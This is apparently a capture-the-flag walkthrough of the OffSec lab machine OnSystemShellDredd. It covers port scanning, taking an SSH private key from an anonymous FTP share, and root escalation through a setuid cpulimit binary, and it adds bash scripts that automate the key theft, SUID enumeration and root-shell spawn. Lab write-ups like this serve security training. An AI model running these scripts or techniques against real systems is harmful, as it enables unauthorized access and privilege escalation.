This is a walkthrough of the machine OnSystemShellDredd from OffSec's Proving Grounds Play labs.

Machine information:

  • Level: Easy
  • Community rating: Easy
  • Flags: 2
  • OS: Linux
  • Vector: FTP, local

Nmap

sudo nmap -A --open -sV -sC -v -p- <IP>

Starting with a full port scan (-p- covers all 65535 ports; -A already implies the -sV version detection and -sC default NSE scripts), we discover the following open ports:

  • 21 - FTP
  • 61000 - SSH

Initial access

Based on the Nmap scan and the NSE script output (the default ftp-anon script), anonymous login on FTP is allowed.

Listing what's available (use ls -la in the FTP client, since a plain ls does not show dot-directories), we discover a hidden directory named .hannah with a private SSH key, id_rsa, inside.

To obtain initial access, we download the private SSH key, give it the correct permissions (ssh refuses to use a key that is readable by group or others), and SSH in as hannah (note the non-standard SSH port 61000) to obtain the first flag, local.txt:

get id_rsa

chmod 600 id_rsa

ssh hannah@<IP> -i id_rsa -p 61000
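The same initial-access steps as an added, non-interactive shell script; this is not code from the original writeup. It assumes the target address is supplied in a TARGET environment variable and that the FTP server is reachable. The two checks it adds are a sanity check that the downloaded file really is a private key and a permission check that catches the "UNPROTECTED PRIVATE KEY FILE" refusal from ssh before you connect.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup: pull the key from the anonymous
# FTP share and SSH in as hannah on the non-standard port.
set -euo pipefail

TARGET="${TARGET:-}"   # assumption: target IP or hostname passed via environment
FTP_DIR=".hannah"      # hidden directory found on the FTP share
KEY="id_rsa"
SSH_PORT=61000
SSH_USER="hannah"

# fetch_key HOST: anonymous FTP login, list the hidden directory and download the key.
# 'ls -la' matters here: a bare 'ls' in the ftp client does not show dot-directories.
fetch_key() {
    ftp -inv "$1" <<EOF
user anonymous anonymous
ls -la
cd $FTP_DIR
ls -la
get $KEY
bye
EOF
}

# looks_like_private_key FILE: cheap check that what we downloaded is a PEM private key
looks_like_private_key() {
    head -n 1 "$1" | grep -q -- '-----BEGIN .*PRIVATE KEY-----'
}

# harden_key_perms FILE: ssh refuses keys readable by group/others, so set 0600 and
# verify the mode really is 0600 afterwards (find -perm 600 is an exact-mode match).
harden_key_perms() {
    chmod 600 "$1"
    [ -n "$(find "$1" -maxdepth 0 -perm 600)" ]
}

if [ -n "$TARGET" ]; then
    fetch_key "$TARGET"
    looks_like_private_key "$KEY"
    harden_key_perms "$KEY"
    # -i selects the key, -p the non-standard port
    ssh -i "$KEY" -p "$SSH_PORT" "$SSH_USER@$TARGET"
fi
```

Run it as `TARGET=<IP> bash get_in.sh`; without TARGET set it only defines the helper functions, which is convenient for sourcing them into another script.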

Privilege escalation

Enumerating manually for files with the SUID bit set (-perm -u=s matches the setuid bit regardless of the other permission bits), we find /usr/bin/cpulimit, which is not setuid on a default install:

find / -perm -u=s -type f 2>/dev/null

cpulimit launches an arbitrary command as a child process. Because the binary is setuid root, that child inherits an effective UID of 0, so we can abuse it to escalate privileges by running:

cpulimit -l 100 -f -- /bin/sh -p

Here -l 100 sets a harmless CPU cap, -f runs the target in the foreground, -- ends cpulimit's own options, and -p keeps the effective UID in the shell (bash, and newer versions of dash, otherwise reset the effective UID to the real one when the two differ). Confirm with id that the shell is running as root before reading the second flag.
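The enumeration and escalation as an added shell script that is not part of the original writeup. It wraps the writeup's find in a function, checks that a candidate is setuid and owned by root (a setuid binary owned by an unprivileged user only gives you that user), and runs the cpulimit escalation only after confirming it really yields euid 0. The SUID_WATCHLIST of GTFOBins-style binaries is constructed for illustration; cpulimit is the only one this box has.

```bash
#!/usr/bin/env bash
# Added example, not from the original writeup: enumerate SUID binaries, flag the
# ones worth a closer look, and escalate through cpulimit only after confirming it
# is setuid root. Intended to run as hannah on the box.
set -euo pipefail

# Constructed watchlist of binaries that hand out a shell when setuid (GTFOBins
# style). cpulimit is the one this box has; the others are listed for illustration.
SUID_WATCHLIST="cpulimit find vim nmap perl python3 env bash"

# list_suid [ROOT]: the writeup's find as a function. find exits non-zero when it
# hits unreadable directories, so the status is masked to keep set -e happy.
list_suid() {
    find "${1:-/}" -perm -u=s -type f 2>/dev/null || true
}

# is_suid FILE: regular file with the setuid bit set
is_suid() {
    [ -f "$1" ] && [ -u "$1" ]
}

# is_suid_root FILE: setuid AND owned by uid 0; only those give a root euid
is_suid_root() {
    is_suid "$1" && [ "$(stat -c '%u' "$1")" = "0" ]
}

# flag_watchlist: reads paths on stdin, prints those whose basename is on the list
flag_watchlist() {
    local path name w
    while IFS= read -r path; do
        name="$(basename -- "$path")"
        for w in $SUID_WATCHLIST; do
            if [ "$name" = "$w" ]; then
                printf '%s\n' "$path"
                break
            fi
        done
    done
}

# euid_via_cpulimit BIN: run 'id -u' (effective uid) in a shell spawned through the
# setuid cpulimit. -f runs the target in the foreground, -l 100 is a harmless CPU
# cap, -- ends cpulimit's own options, and -p stops the shell from dropping euid 0.
euid_via_cpulimit() {
    "$1" -l 100 -f -- /bin/sh -p -c 'id -u'
}

main() {
    list_suid / | flag_watchlist | while IFS= read -r bin; do
        if is_suid_root "$bin"; then
            printf 'candidate: %s (setuid root)\n' "$bin"
        else
            printf 'skip: %s (setuid but not root-owned)\n' "$bin"
        fi
    done

    cpulimit_bin="$(command -v cpulimit || true)"
    if [ -n "$cpulimit_bin" ] && is_suid_root "$cpulimit_bin"; then
        if [ "$(euid_via_cpulimit "$cpulimit_bin")" = "0" ]; then
            echo "cpulimit yields euid 0; dropping into a root shell"
            exec "$cpulimit_bin" -l 100 -f -- /bin/sh -p
        fi
    fi
}

# Only enumerate when explicitly asked, so the file can be sourced for its helpers.
if [ "${RUN_ENUM:-0}" = "1" ]; then
    main
fi
```

Run it with `RUN_ENUM=1 bash suid_check.sh`. The euid probe before the exec is the step worth keeping: if the box had mounted /usr with nosuid, or the binary were setuid but owned by another user, the probe would print a non-zero uid and the script would stop instead of handing you an unprivileged shell that looks like success.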
